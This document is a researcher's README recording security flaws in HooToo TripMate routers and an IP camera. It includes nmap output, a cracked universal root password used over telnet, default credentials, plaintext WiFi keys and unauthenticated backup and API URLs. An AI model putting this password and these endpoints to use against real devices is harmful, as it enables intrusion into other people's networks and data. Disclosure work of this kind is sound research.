h4ck/hootoo/README.md

hoo2
====

- [devices](#devices)
	- [TripMate Titan](#tripmate-titan)
		- [nmap](#nmap)
		- [easily guessable default passwords](#easily-guessable-default-passwords)
		- [universal root password](#universal-root-password)
		- [credential exposure - WiFi network and bridge](#credential-exposure-wifi-network-and-bridge)
		- [data exposure - NAS](#data-exposure-nas)
		- [interesting URLs](#interesting-urls)
		  - [protocol.csp](#protocolcsp)
	- [TripMate](#tripmate)
		- [nmap](#nmap)
		- [upgrading is hard](#upgrading-is-hard)
	- [TripMate Elite](#tripmate-elite)
		- [nmap](#nmap)
	- [TripMate Nano](#tripmate-nano)
		- [nmap](#nmap)
	- [HooToo IPCam](#hootoo-ipcam)
		- [nmap](#nmap)

i was initially interested in the HooToo TripMate Titan when someone on Twitter (thought it was @davepell, but can't find the tweet now) saying it was a great way to share battery/network/data from a single device.

that sounds cool - not just for the surface use cases: road trips, airplane flights, etc - but also because the features required meant the TripMate was a $39 low power, wifi enabled computer with it's own battery. <insert cheesy Zuckerberg misquote here>

my goal was always to gain access to this device in ways it's manufacturer hadn't intended, but what i found was a bit excessive.

some of the issues are as common as XSS vulnerabilities, others as serious as passing credentials/settings in plaintext over HTTP and a universally reused root password.

* after testing the [rav-filehub](rav-filehub), found that calling an-api-method-not-exposed-by-the-ui would allow download of a ['backup'](http://10.10.10.254:81/sysfirm.csp?fname=sysbackupform&t=1467949779552). i haven't tried POSTing it back, but assume it would work.

# devices
name|model|description|version|rooted?|services|vulnerabilities
----|-----|-----------|-------|-------|--------|---------------
[TripMate Titan](http://www.hootoo.com/hootoo-tripmate-ht-tm05-wireless-router.html)|HT-TM05|NAS/WiFi bridge/battery| firmware: `2.000.022`|yes|`telnet`, `http (80, 81)`, `unknown 85, 8200)`|easily guessable default passwords, universal root password, credential exposure, data exposure, HTTP - variety
[TripMate](http://www.hootoo.com/hootoo-tripmate-ht-tm01-wireless-router.html)|HT-TM01|NAS/WiFi bridge/battery| firmware: `2.000.022`|yes|`telnet`, `http (80, 81)`|same as TripMate Titan
[TripMate Elite](http://www.hootoo.com/hootoo-tripmate-elite-ht-tm04-wireless-portable-router.html)|HT-TM06|NAS/WiFi bridge/battery/outlet|firmware: `2.000.004`|no|`http (80, 81)`|easily guessable default passwords, HTTP - variety
[TripMate Nano](http://www.hootoo.com/hootoo-tripmate-nano-ht-tm02-wireless-portable-router.html)|HT-TM02|NAS/WiFi bridge| firmware: `2.000.018`|yes|`telnet`, `http (80, 81)`, `unknown 85`|same as TripMate Titan
[Hootoo IPCam]()|RT_IPC6000|IP camera| firmware: `V2.5.5.2505-S50-HTA-B20151208B` |yes|`telnet`, `http`, `RTSP 554`|almost the same as TripMate Titan

while both TripMate Titan and TripMate are running the same version of firmware, and have the same services exposed, the web interfaces are very different.

despite the striking similarities between the underlying platforms, it appears they all rev firmware versions differently. currently, the latest TripMate Titan version is [2.000.068](http://www.hootoo.com/media/downloads/HooToo%20TM05-Support%20exFAT&HFS%20-%202.000.068.rar), whereas the TripMate is only up to [2.000.036](http://www.hootoo.com/media/downloads/fw-ban%20WAN%20access-%20HooToo-%20TM01-2.000.036.zip).

see [upgrades-are-hard](upgrades are hard) for a tale of firmware version changes while trying to test the most recent versions.

## TripMate Titan
name|value
----|-----
model|HT-TM05
firmware|2.000.022
features|WiFi bridge, NAS, battery
app|[http://10.10.10.254](http://10.10.10.254)

this was the first HooToo device i looked at, and most of the issues found on this device are shared across the rest of the products - the Elite and ipCAM being notable exceptions.

all of the non-HTTP issues started with a simple nmap of the device.

### nmap
```
PORT   STATE SERVICE    VERSION
23/tcp open  telnet     NASLite-SMB/Sveasoft Alchemy firmware telnetd
80/tcp open  http       lighttpd
81/tcp open  http       Web-Based Enterprise Management CIM serverOpenPegasus WBEM httpd
85/tcp open  tcpwrapped
8200/tcp open  trivnet1?
Service Info: Host: HT-TM05; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

couple of quick observations:
  * running a telnet server?
  * running 2 HTTP servers?

it turns out that both [http://10.10.10.254:80](http://10.10.10.254:80) and [http://10.10.10.254:81](http://10.10.10.254:81) are both serving the exact same content - but backed by different web servers (`lighttpd` and `OpenPegasus WBEM CIM`)


### easily guessable default passwords

realm|username|password|description
-----|--------|--------|------------
WiFi|n/a|`12345678`|this is changeable, but the option is buried
app|admin|`<empty>`|allows login to web app ([default](http://10.10.10.254))

### universal root password

while not easily guessable, the `root` password is trivial to obtain:

```
$ telnet 10.10.10.254
Trying 10.10.10.254...
Connected to 10.10.10.254.
Escape character is '^]'.

HT-TM05 login: admin
Password:
login: can't chdir to home directory '/data/UsbDisk1/Volume1'
$ ls -l /etc/passwd /etc/shadow
-rw-r--r--    1 root     root          406 Jan  1 00:02 /etc/passwd
-rw-r--r--    1 root     root          282 Jan  1 00:02 /etc/shadow
```

so.. they left `/etc/passwd` and `/etc/shadow` readable to anyone who can login - and the web app uses the same credential mechanism as telnet/underlying OS.

now that we've got it, 5 hours on a GCP v16 CPU instance, we find that the password behind `$1$yikWMdhq$cIUPc1dKQYHkkKkiVpM` is `20080826`.

and now, we can login to both the web app and telnetd as `root`:
```
$ telnet 10.10.10.254
Trying 10.10.10.254...
Connected to 10.10.10.254.
Escape character is '^]'.

HT-TM05 login: root
Password:
login: can't chdir to home directory '/root'
#
```

#### credential exposure - WiFi network and bridge

# TODO what are the perms on that file?

the contents of `/boot/tmp/etc/Wireless/RT2860/RT2860.dat` compromise:
  * plaintext password for device SSID
  * SSID of last/currently bridged WiFi network
  * plaintext password for last/currently bridged WiFi network

```
# cat /boot/tmp/etc/Wireless/RT2860/RT2860.dat
...
SSID1=free candy
...
WPAPSK1=foobarbaz
...
ApCliSsid1=test-network
ApCliWPAPSK=password
```

#### data exposure - NAS

without really explaining it or documenting it, the TripMate assumes that the USB storage device you plugin will have a directory called `Share` in it's root, with `Music`, `Pictures` and `Videos` directories under that. if you don't, it will happily create them for you.

i put some content in the appropriate path, and when walking through the Music player, it sent me to `http://10.10.10.254/data/UsbDisk1/Volume1/Share/Music/Girl%20Talk%20-%20Feed%20The%20Animals/14%20Play%20Your%20Part%20%28Pt.%202%29.mp3`

working URLs:
  * `http://10.10.10.254/data/UsbDisk1/Volume1/Share/` - not necessarily bad, just unexpected
  * `http://10.10.10.254/data/UsbDisk1/Volume1/` - this is an implied vulnerability
  * `http://10.10.10.254/data/` - another implied vulnerability.. could we link something into this directory and get browsable access that way?


#### interesting URLs

# TODO need to add context here

* `http://10.10.10.254//index.csp?fname=logout`
* `http://10.10.10.254/protocol.csp?fname=net&opt=led_status&function=get`
* `http://10.10.10.254/protocol.csp?fname=storage&opt=listen_disk&function=get`
* `http://10.10.10.254/protocol.csp?fname=system&opt=i2c&function=get`
* `http://10.10.10.254/protocol.csp?fname=security&opt=userlock&function=set`
* `http://10.10.10.254/protocol.csp?function=set` -

parameters:
  * name
  * pwd1

# TODO need to talk about GET vs POST here

* `http://10.10.10.254/themes/HT-TM05/lge/us.js` - error code to message mapping
* when no internet connection is available, all HTTP requests are blindly 301'd to [http://10.10.10.254/app/main.html](http://10.10.10.254/app/main.html)
* [hootoo.com's 404](http://www.hootoo.com/foobarbaz) page is .. amusing

#### protocol.csp
fname|opts
-----|----
net  | [led_status](http://10.10.10.254/protocol.csp?fname=net&opt=led_status&function=get), [waninfo](http://10.10.10.254/protocol.csp?fname=net&opt=led_status&function=get)
pwdcheck | \<none, uses name/pwd1\>
security | [userlock](http://10.10.10.254/protocol.csp?fname=security&opt=userlock&function=post), [dirlist](http://10.10.10.254/protocol.csp?fname=security&opt=dirlist&function=get)
storage | [listen_disk](http://10.10.10.254/protocol.csp?fname=storage&opt=listen_diskt&function=get), [partopt](http://10.10.10.254/protocol.csp?fname=storage&opt=partopt&function=get), [disk](http://10.10.10.254/protocol.csp?fname=storage&opt=disk&function=get), [usbremove](http://10.10.10.254/protocol.csp?fname=storage&opt=usbremove&function=post)
system | i2c, host, devinfo, cpu, autoupdate, curtype

have not done enough digging in this area, but several of these opts accept `function=set`, potentially allowing for DOS attacks.

## TripMate

### nmap
```
Starting Nmap 6.46 ( http://nmap.org ) at 2016-06-29 20:45 PDT
Nmap scan report for 10.10.10.254
Host is up (0.026s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  NASLite-SMB/Sveasoft Alchemy firmware telnetd
80/tcp open  http    lighttpd
81/tcp open  http    Web-Based Enterprise Management CIM serverOpenPegasus WBEM httpd
Service Info: Host: TM01; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
### upgrading is hard

when i tried to upgrade the TripMate, i failed with an error message `No available space`, which seemed odd.

```
// 'No available space'
# df -h
Filesystem                Size      Used Available Use% Mounted on
rootfs                    5.3M      5.3M         0 100% /
/dev/root                 5.3M      5.3M         0 100% /

// 'The system is being upgraded. Please wait 5 minutes. Remaining <n> seconds …After the upgrade is successful,reconnect the device Wi-Fi.'
# df -h
Filesystem                Size      Used Available Use% Mounted on
rootfs                    5.3M      5.3M         0 100% /
/dev/root                 5.3M      5.3M         0 100% /
/dev/sda1                 3.8G   1020.0k      3.8G   0% /data/UsbDisk1/Volume1
```

despite the firmware upgrade.. going on the firmware, rather than uploading to tmpfs (as `free` shows ). after the upgrade, the SSID was changed to `TripMate-855C`, and unfortunately, the `telnet` hole was closed - and in it's place, a 404 behind:
  * User Manager -> Guest
  * Network Settings -> Hostname
  * Network Settings -> WiFi & latency
  * Network Settings -> DHCP Server
  * Network Settings -> Internet
  * Service Settings -> Samba Service
  * Service Settings -> DLNA Service
  * Service Settings -> Auto-jump Service
  * System Settings -> Time Settings
  * System Settings -> Firmware Upgrade
  * System Settings -> Reset Settings
  * Setup Wizard

so every option other than User Manager -> Admin.. on the web interface that's running on port 80. however, the interface that is running on port 81 gives us all of the options back - assuming you know it is there.


## TripMate Elite

### nmap
```
Starting Nmap 6.46 ( http://nmap.org ) at 2016-06-29 20:49 PDT
Nmap scan report for 10.10.10.254
Host is up (0.0096s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    lighttpd
81/tcp open  http    Web-Based Enterprise Management CIM serverOpenPegasus WBEM httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## TripMate Nano

### nmap
```
Starting Nmap 6.46 ( http://nmap.org ) at 2016-06-29 20:41 PDT
Nmap scan report for 10.10.10.254
Host is up (0.018s latency).
Not shown: 996 closed ports
PORT   STATE SERVICE    VERSION
23/tcp open  telnet     NASLite-SMB/Sveasoft Alchemy firmware telnetd
80/tcp open  http       lighttpd
81/tcp open  http       Web-Based Enterprise Management CIM serverOpenPegasus WBEM httpd
85/tcp open  tcpwrapped
Service Info: Host: TM02; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Hootoo IPCam
name|value
----|-----
model|RT_IPC6000
firmware|`V2.5.5.2505-S50-HTA-B20151208B`
features|IP camera with a surprisingly high level of configuration
app|[http://10.10.10.254](http://10.10.10.254)

while this device appears to be running a similar firmware/OS as the TripMate devices, and has similar services exposed, could not login via telnet with `root` or `admin`

the user specification page allows freeform username specification, tried to set `root`s password, but either failed, or was given a misleading error message from telnet.

the backup functionality here exposes a similar hole (configuration/files unrelated to user settings) as TripMate devices, but has a very different structure/content:

```
.
├── mnt
│   └── config
│       ├── exclude.lst
│       ├── ipcamera
│       │   ├── TZ
│       │   ├── adsl.conf
│       │   ├── bt656
│       │   │   ├── config_av.ini
│       │   │   ├── config_enc.ini
│       │   │   ├── config_md.ini
│       │   │   ├── config_mpmng.ini
│       │   │   └── config_od.ini
│       │   ├── conf_1080p
│       │   │   ├── config_cfgaccess.ini
│       │   │   ├── config_devm.ini
│       │   │   └── config_mpmng.ini
│       │   ├── conf_720p
│       │   │   ├── config_cfgaccess.ini
│       │   │   ├── config_devm.ini
│       │   │   └── config_mpmng.ini
│       │   ├── conf_960p
│       │   │   ├── config_cfgaccess.ini
│       │   │   ├── config_devm.ini
│       │   │   └── config_mpmng.ini
│       │   ├── conf_TrigOprt.ini
│       │   ├── conf_jsy
│       │   │   └── jsy.ini
│       │   ├── conf_tutk
│       │   │   └── tutk.ini
│       │   ├── config_alarmweb.ini
│       │   ├── config_button.ini
│       │   ├── config_capability.ini
│       │   ├── config_cd.ini
│       │   ├── config_cfgaccess.ini
│       │   ├── config_devm.ini
│       │   ├── config_electricity.ini
│       │   ├── config_emng.ini
│       │   ├── config_enc_workmode.ini
│       │   ├── config_ioalm.ini
│       │   ├── config_ircut.ini
│       │   ├── config_led.ini
│       │   ├── config_log.ini
│       │   ├── config_mail.ini
│       │   ├── config_maintenance.ini
│       │   ├── config_mtmng.ini
│       │   ├── config_mwalm.ini
│       │   ├── config_notify.ini
│       │   ├── config_ntp.ini
│       │   ├── config_osd.ini
│       │   ├── config_piclevel.ini
│       │   ├── config_playaudio.ini
│       │   ├── config_ptz.ini
│       │   ├── config_rec.ini
│       │   ├── config_recmng.ini
│       │   ├── config_rfidlist.ini
│       │   ├── config_server.ini
│       │   ├── config_snap_function.ini
│       │   ├── config_snap_mng.ini
│       │   ├── config_soundalm.ini
│       │   ├── config_sysalm.ini
│       │   ├── config_timer_mng.ini
│       │   ├── config_upnp.ini
│       │   ├── config_user.ini
│       │   ├── config_usergroup.ini
│       │   ├── ddns.conf
│       │   ├── ddns_enable.conf
│       │   ├── factory.conf
│       │   ├── fwup.conf
│       │   ├── hi_nvt_config
│       │   │   ├── audio_encoder_configuration.ini
│       │   │   ├── audio_source.ini
│       │   │   ├── audio_source_configuration.ini
│       │   │   ├── profile.ini
│       │   │   ├── ptz_configuration.ini
│       │   │   ├── scopes_list.ini
│       │   │   ├── video_encoder_configuration.ini
│       │   │   ├── video_source.ini
│       │   │   └── video_source_configuration.ini
│       │   ├── ipc1080p
│       │   │   ├── config_av.ini
│       │   │   ├── config_enc.ini
│       │   │   ├── config_md.ini
│       │   │   ├── config_mpmng.ini
│       │   │   └── config_od.ini
│       │   ├── ipc6000
│       │   │   ├── config_av.ini
│       │   │   ├── config_enc.ini
│       │   │   ├── config_md.ini
│       │   │   ├── config_mpmng.ini
│       │   │   └── config_od.ini
│       │   ├── ipcam_upnp.xml
│       │   ├── keypara.ini
│       │   ├── network
│       │   │   ├── interfaces.old
│       │   │   ├── netfaces
│       │   │   ├── resolv.conf
│       │   │   ├── setfixnet.sh
│       │   │   ├── wifi.conf
│       │   │   ├── wifidev.conf
│       │   │   ├── wpa_supp.conf
│       │   │   └── zcip.script
│       │   ├── onvif.ini
│       │   ├── p2p.conf
│       │   ├── p2p_stream.ini
│       │   ├── savetime.conf
│       │   └── webserver.conf
│       └── usr
│           ├── bin
│           │   └── ddnsrun -> /usr/sbin/ddns/ddnsrun.3322
│           ├── etc
│           │   └── sensor.conf
│           └── lib
│               ├── libSensor.so -> /usr/lib/libsns_ov9712a.so
│               └── libonvif.so -> /usr/lib/libonvif_def.so
└── tree

17 directories, 98 files

```

modified `exclude.lst` to try and pull in the right functionality:

```
NOT_config_devs.ini
NOT_config_net.ini
NOT_config_priv.ini
NOT_wifi.ini
NOT_ifattr
NOT_ddns_tvs.conf
```

and restored it back to the device:

```
the ipcam will be restore. Are you sure?
```

no new functionality was exposed via nmap and still couldn't log in over telnet, but a second backup confirmed that my 'settings' were restored correctly. time to find another avenue.

`/mnt/config/ipcamera/network/wifi.conf` contains the current WiFI SSID/password:
```
wifienable="1"
wifiessid=TEST-WIFI
wifikeytype=3
wifiwhichkey=0
wifikey="TEST-WIFI"
```

`/mnt/config/ipcamera/config_server.ini` looks has an interesting block:
```ini
;
;[mctp]
;port                           = 8001
;
;[devs]
;port                           = 8002
;
;[es]
;port                           = 8003
;
```

`/mnt/config/ipcamera/config_mtmng.ini` appears to be what we're looking for:
```ini
[rtspsvr]
enable			       = 1
lisnport                       = 554
max_conn_num		       = 32
udp_sendport_min               = 5000
udp_sendport_min               = 6000
com_id                         = 012345678901234567890123

[httpsvr]
enable			       = 1
lisnport                       = 8800
max_conn_num		       = 32
...
[owspsvr]
enable                         = 1
max_conn_num                   = 4
server_ipaddr              = "192.168.1.18"
server_port                = 15960
username                   = "admin"
password                   = "admin"
quality                    = 1              ;0:32K,1:64K,2:128K,3:512K
companyIdentity            = "LT4a7a46c5571ce"
...
[langtaodev]
server_ipaddr              = "61.139.77.71"
server_port                = 15961
username                   = "ip700"
password                   = "00"
deviceid                   = 1929
versionMajor               = 2
versionMinor               = 1
mediaType                  = 1              ;1:VIDEO,2;VIDEO & AUDIO
devideModule               = 2            ; 1:MODULE_MASTER, 2:MODULE_PARSVE
chnId                      = 11             ;chnID: 011

[langtaodev-scdx1]
server_ipaddr              = "61.139.77.71"
server_port                = 15961
username                   = "ip700"
password                   = "00"
deviceid                   = 1929
versionMajor               = 2
versionMinor               = 1
mediaType                  = 1              ;1:VIDEO,2;VIDEO & AUDIO
devideModule               = 2            ; 1:MODULE_MASTER, 2:MODULE_PARSVE
chnId                      = 11             ;chnID: 011
```

that last part is a bit concerning - whois `61.139.77.71`?

```
$ host 61.139.77.71
Host 71.77.139.61.in-addr.arpa. not found: 3(NXDOMAIN)
$ ping -c 3 61.139.77.71
PING 61.139.77.71 (61.139.77.71): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
--- 61.139.77.71 ping statistics ---
3 packets transmitted, 0 packets received, 100.0% packet loss
```

`/mnt/config/ipcamera/config_log.ini` shows that syslog is disabled:
```ini
lenmsg                         = "512        	";Ӧ<><D3A6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ij<EFBFBD><C4B3><EFBFBD>
syslog                         = "n             " ;<3B>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD>ϵͳ<CFB5><CDB3>־
savefile                       = "y             " ;<3B>Ƿ<EFBFBD><C7B7><EFBFBD>ļ<EFBFBD>;
filename                       = "/bin/vs/log/debuglog.txt  ";
filemaxsize                    = "500            ";<3B><><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><>KBΪ<42><CEAA>λ

```

enabling it blindly, but also looking for a way to get the file on disk

after a few modifications:

```
 nmap 192.168.42.24 -PN -sV -p 1-65535

Starting Nmap 6.46 ( http://nmap.org ) at 2016-07-16 13:53 PDT
Nmap scan report for 192.168.42.24
Host is up (0.0085s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
23/tcp    open  telnet  Busybox telnetd
80/tcp    open  http    thttpd 2.25b 29dec2003
554/tcp   open  rtsp?
1018/tcp  open  soap    gSOAP soap 2.8
1235/tcp  open  unknown
8840/tcp  open  unknown
41477/tcp open  unknown

```

### nmap
```
Starting Nmap 6.46 ( http://nmap.org ) at 2016-07-16 10:46 PDT
Nmap scan report for 192.168.42.24
Host is up (0.0100s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
23/tcp  open  telnet  Busybox telnetd
80/tcp  open  http    thttpd 2.25b 29dec2003
554/tcp open  rtsp?
```

nmap was able to get traffic back from `554`, but it was an unrecognized fingerprint:

```
SF-Port554-TCP:V=6.46%I=7%D=7/16%Time=578A72F1%P=x86_64-apple-darwin13.1.0
SF:%r(GetRequest,4E,"RTSP/1\.0\x20400\x20Bad\x20Request\r\nCache-Control:\
SF:x20no-cache\r\nServer:\x20Hisilicon\x20Ipcam\r\n\r\n")%r(RTSPRequest,6F
SF:,"RTSP/1\.0\x20200\x20OK\r\nServer:\x20HiIpcam/V100R003\x20VodServer/1\
SF:.0\.0\r\nPublic:\x20OPTIONS,\x20DESCRIBE,\x20SETUP,\x20TEARDOWN,\x20PLA
SF:Y\r\n\r\n")%r(GenericLines,4E,"RTSP/1\.0\x20400\x20Bad\x20Request\r\nCa
SF:che-Control:\x20no-cache\r\nServer:\x20Hisilicon\x20Ipcam\r\n\r\n")%r(H
SF:TTPOptions,6F,"RTSP/1\.0\x20200\x20OK\r\nServer:\x20HiIpcam/V100R003\x2
SF:0VodServer/1\.0\.0\r\nPublic:\x20OPTIONS,\x20DESCRIBE,\x20SETUP,\x20TEA
SF:RDOWN,\x20PLAY\r\n\r\n")%r(RPCCheck,4E,"RTSP/1\.0\x20400\x20Bad\x20Requ
SF:est\r\nCache-Control:\x20no-cache\r\nServer:\x20Hisilicon\x20Ipcam\r\n\
SF:r\n")%r(DNSVersionBindReq,4E,"RTSP/1\.0\x20400\x20Bad\x20Request\r\nCac
SF:he-Control:\x20no-cache\r\nServer:\x20Hisilicon\x20Ipcam\r\n\r\n")%r(DN
SF:SStatusRequest,4E,"RTSP/1\.0\x20400\x20Bad\x20Request\r\nCache-Control:
SF:\x20no-cache\r\nServer:\x20Hisilicon\x20Ipcam\r\n\r\n")%r(Help,4E,"RTSP
SF:/1\.0\x20400\x20Bad\x20Request\r\nCache-Control:\x20no-cache\r\nServer:
SF:\x20Hisilicon\x20Ipcam\r\n\r\n")%r(SSLSessionReq,4E,"RTSP/1\.0\x20400\x
SF:20Bad\x20Request\r\nCache-Control:\x20no-cache\r\nServer:\x20Hisilicon\
SF:x20Ipcam\r\n\r\n")%r(Kerberos,4E,"RTSP/1\.0\x20400\x20Bad\x20Request\r\
SF:nCache-Control:\x20no-cache\r\nServer:\x20Hisilicon\x20Ipcam\r\n\r\n")%
SF:r(SMBProgNeg,4E,"RTSP/1\.0\x20400\x20Bad\x20Request\r\nCache-Control:\x
SF:20no-cache\r\nServer:\x20Hisilicon\x20Ipcam\r\n\r\n")%r(X11Probe,4E,"RT
SF:SP/1\.0\x20400\x20Bad\x20Request\r\nCache-Control:\x20no-cache\r\nServe
SF:r:\x20Hisilicon\x20Ipcam\r\n\r\n")%r(FourOhFourRequest,4E,"RTSP/1\.0\x2
SF:0400\x20Bad\x20Request\r\nCache-Control:\x20no-cache\r\nServer:\x20Hisi
SF:licon\x20Ipcam\r\n\r\n")%r(LPDString,4E,"RTSP/1\.0\x20400\x20Bad\x20Req
SF:uest\r\nCache-Control:\x20no-cache\r\nServer:\x20Hisilicon\x20Ipcam\r\n
SF:\r\n")%r(LDAPBindReq,4E,"RTSP/1\.0\x20400\x20Bad\x20Request\r\nCache-Co
SF:ntrol:\x20no-cache\r\nServer:\x20Hisilicon\x20Ipcam\r\n\r\n")%r(SIPOpti
SF:ons,79,"RTSP/1\.0\x20200\x20OK\r\nServer:\x20HiIpcam/V100R003\x20VodSer
SF:ver/1\.0\.0\r\nCseq:\x2042\r\nPublic:\x20OPTIONS,\x20DESCRIBE,\x20SETUP
SF:,\x20TEARDOWN,\x20PLAY\r\n\r\n");
Service Info: Host: RT-IPC
```

scanning harder, we see:

```
nmap 192.168.42.24 -PN -sV -p 1-65535

Starting Nmap 6.46 ( http://nmap.org ) at 2016-07-16 13:33 PDT
Nmap scan report for 192.168.42.24
Host is up (0.011s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
23/tcp    open  telnet  Busybox telnetd
80/tcp    open  http    thttpd 2.25b 29dec2003
554/tcp   open  rtsp?
1018/tcp  open  soap    gSOAP soap 2.8
1235/tcp  open  unknown
8840/tcp  open  unknown
47056/tcp open  unknown
```

```
 nmap 192.168.42.24 -PN -sV -p 1-65535

Starting Nmap 6.46 ( http://nmap.org ) at 2016-07-16 13:53 PDT
Nmap scan report for 192.168.42.24
Host is up (0.0085s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
23/tcp    open  telnet  Busybox telnetd
80/tcp    open  http    thttpd 2.25b 29dec2003
554/tcp   open  rtsp?
1018/tcp  open  soap    gSOAP soap 2.8
1235/tcp  open  unknown
8840/tcp  open  unknown
41477/tcp open  unknown
```

looking at packet captures, we see:

```
GET /cgi-bin/hi3510/checkuser.cgi?&-name=admin&-passwd=admin&-time=1468691201459 HTTP/1.1
Host: 192.168.42.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.42.24/web/index.html
Connection: keep-alive

HTTP/1.0 200 OK
Content-Type:text/html

var check="1";
 var authLevel ="255";
```

indicating a successful login, which sets a cookie:
```
Cookie: language=en; username=YWRtaW4%3D; password=YWRtaW4%3D; authLevel=255
```

so 8 characters, final being `=`, likely padding giving us `YWRtaW4=`. a quick base64 decode shows that we're effectively passing passwords in the clear:

```
$ echo YWRtaW4= | base64 -dD
Jul 16 14:15:32 mba base64[75917] <Info>: Read 9 bytes.
Jul 16 14:15:32 mba base64[75917] <Info>: Decoded to 5 bytes.
Jul 16 14:15:32 mba base64[75917] <Info>: Wrote 5 bytes.
admin
```

```
POST /web/cgi-bin/hi3510/param.cgi HTTP/1.1
Host: 192.168.42.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.42.24/web/user.html
Cookie: language=en; username=YWRtaW4%3D; password=YWRtaW4%3D; authLevel=255
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 283

cmd=updateuser&cururl=http%3A%2F%2F192.168.42.24%2Fweb%2Fuser.html&user0=admin%3Aadmin%3A255%3AAdmin&user1=guest%3Aguest%3A3%3AGuest&user2=root%3Afoobarbaz%3A3%3ANormal&user3=%3A%3A3%3ANormal&user4=%3A%3A3%3ANormal&user5=%3A%3A3%3ANormal&user6=%3A%3A3%3ANormal&user7=%3A%3A3%3ANormal
```

```
GET /tmpfs/config_backup.bin HTTP/1.1
Host: 192.168.42.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.42.24/web/initializemain.html
Connection: keep-alive

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003
Content-Type: application/octet-stream
Date: Sat, 16 Jul 2016 18:03:12 GMT
Last-Modified: Sat, 16 Jul 2016 18:03:12 GMT
Accept-Ranges: bytes
Connection: close
Content-Length: 25098
```

getting the backup file from the web UI doesn't require/pass a cookie at all

```
GET /cgi-bin/hi3510/ptzleft.cgi?&-chn=0&-speed=31&-randoma8b9ctime=%221468693040013%22 HTTP/1.1
Host: 192.168.42.24
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.42.24/web/index.html
Connection: keep-alive

HTTP/1.0 200 OK
Content-Type:text/html

call ptz funtion success

```

amusing typo in an API method:

```
GET /web/cgi-bin/hi3510/param.cgi?cmd=getsdcareInfo HTTP/1.1
Host: 192.168.234.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.234.1/web/storage.html
Cookie: language=en; auto login=0; username=YWRtaW4%3D; password=YWRtaW4%3D; authLevel=255
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.0 200 OK
Content-Type:text/html

sdstatus="out";
sdfreespace="0 ";
sdtotalspace="0 ";
```

more non-cookie based requests, this time for wireless network scanning:
```
GET /cgi-bin/scanwifi.cgi?cmd=scanwifi.cgi&-time=%221465316774370%22 HTTP/1.1
Host: 192.168.234.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.234.1/web/wifi.html
Connection: keep-alive

HTTP/1.0 200 OK
Content-Type:text/plain


var ssid_1="bssid signal ssid";
var ssid_2="Sonic.net-972";
var ssid_3="Artein";
var ssid_4="Sonic-4443";
var ssid_5="sinL";
var ssid_6="Harrison Jones";
var ssid_7="";
var ssid_8="BiscuitHammer";
var ssid_9="NETGEAR56";
var ssid_10="NETGEAR52";
var ssid_11="House LANnister";
var ssid_12="elma";
var ssid_13="Purplepashmina";
var ssid_14="";
var ssid_15="Registry-2";
var ssid_16="KAM_Francisco_2G";
var ssid_17="bluthcompanyHQ";
var ssid_18="bluthcompanyGUEST";
var ssid_19="folsom942";
var ssid_20="PRIVATENETWORK";
var ssid_21="legofeel";
var ssid_22="Temple of Joseidon";
var ssid_23="xfinitywifi";
var ssid_24="MonkeyBrains.net";
var ssid_25="APZ-Guest";
var ssid_26="imaqtpie";
var ssid_27="citicomm";
var ssid_28="APZ";
var ssid_29="711";
var ssid_30="macchiato";
var ssid_31="Winternet is coming";
var ssid_32="Pretty fly for a Wifi";
var ssid_33="MU Guest";
var ssid_34="Jeff's Wi-Fi Network";
var ssid_35="";
var ssid_36="CYWD";
var ssid_37="HouseofEghbali";
var ssid_38="xfinitywifi";
var ssid_39="HP-Print-D7-ENVY 4500 series";
var ssid_40="TP-LINK_38BC";
var ssid_41="";
var ssid_42="seattlestyle";
var ssid_43="Celsus932";
var ssid_44="";
var ssid_45="";
var ssid_46="OwnYourData2.4";
var ssid_47="CGN3-78F8";
var ssid_48="Bespoke";
var ssid_49="ATT448";
var ssid_50="";
var ssid_51="";
